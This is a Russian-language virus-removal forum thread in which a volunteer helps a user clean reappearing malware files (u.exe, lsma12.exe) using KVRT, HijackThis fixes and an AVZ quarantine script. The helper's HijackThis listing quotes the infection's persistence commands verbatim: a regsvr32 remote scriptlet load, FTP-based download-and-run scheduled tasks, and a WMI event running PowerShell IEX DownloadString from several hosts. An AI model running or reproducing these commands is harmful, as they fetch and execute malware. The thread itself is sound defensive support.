Перейти к содержимому


Фотография
- - - - -

Тормозит ноутбук после запуска u.exe (lsma12.exe)

Друзья!

 В данном разделе форума действуют дополнительные правила — тема «Общие правила раздела "Уничтожение вирусов"». Пожалуйста, ознакомьтесь с ними перед размещением любого сообщения в данном разделе.

Для оформления запроса о помощи, внимательно прочитайте и аккуратно выполните указания в теме «Порядок оформления запроса о помощи».


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 3

#1 OFF   cerealguy3456

cerealguy3456

    Новичок

  • Новички
  • Cообщений: 2

Отправлено 13 Февраль 2020 - 15:34

После включения через пару минут запускается командная строка которая включает u.exe. Затем ноутбук зависает, не реагирует и не отключается. По адресу где расположен u.exe C:\Windows\inf\aspnet есть еще lsma12. 
Ноутбук работает только в безопасном режиме. 

Пожалуйста, подскажите как удалить вирус? 

 

 

Прикрепленные файлы


Сообщение отредактировал cerealguy3456: 13 Февраль 2020 - 15:36

  • 0

#2 OFF   Sandor

Sandor

    Вежливый хелпер

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 11 546

Отправлено 13 Февраль 2020 - 15:42

Здравствуйте!

Пролечите систему с помощью KVRT.
По окончании зайдите в папку C:\KVRT_Data\, упакуйте папку Reports в архив и прикрепите к следующему сообщению.

Также соберите новый CollectionLog Автологером (пробуйте в нормальном режиме).
  • 0
Изображение

#3 OFF   cerealguy3456

cerealguy3456

    Новичок

  • Новички
  • Cообщений: 2

Отправлено 13 Февраль 2020 - 21:16

Здравствуйте! 
Спасибо за ответ! 
К сожалению в нормальном режиме так и не удалось просканировать и сделать лог. Даже проверка KVRT была в нормальном режиме один раз прервана. Файлы u.exe и lsma12.exe после удаления появляются снова.
 

 

Прикрепленные файлы


  • 0

#4 OFF   Sandor

Sandor

    Вежливый хелпер

  • Консультанты
  • Старожилы
  • PipPipPipPipPipPipPipPipPipPipPipPipPip
  • Cообщений: 11 546

Отправлено 14 Февраль 2020 - 09:55

"Пофиксите" в HijackThis:
O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX 
Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 ClearQuarantineEx(true);
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('c:\windows\debug\ok.dat', '');
 QuarantineFile('c:\windows\help\lsmosee.exe', '');
 QuarantineFile('c:\windows\inf\aspnet\lsma12.exe', '');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteSchedulerTask('VKDJ');
 DeleteFile('c:\windows\debug\item.dat', '32');
 DeleteFile('c:\windows\debug\ok.dat', '32');
 DeleteFile('c:\windows\help\lsmosee.exe', '32');
 DeleteFile('c:\windows\inf\aspnet\lsma12.exe', '32');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.
Компьютер перезагрузится.

Пробуйте дальше работать в нормальном режиме.

После перезагрузки выполните такой скрипт:

begin
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
end.
Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KL-).



Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.
Прикрепите к следующему сообщению свежий CollectionLog.
  • 0
Изображение




Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных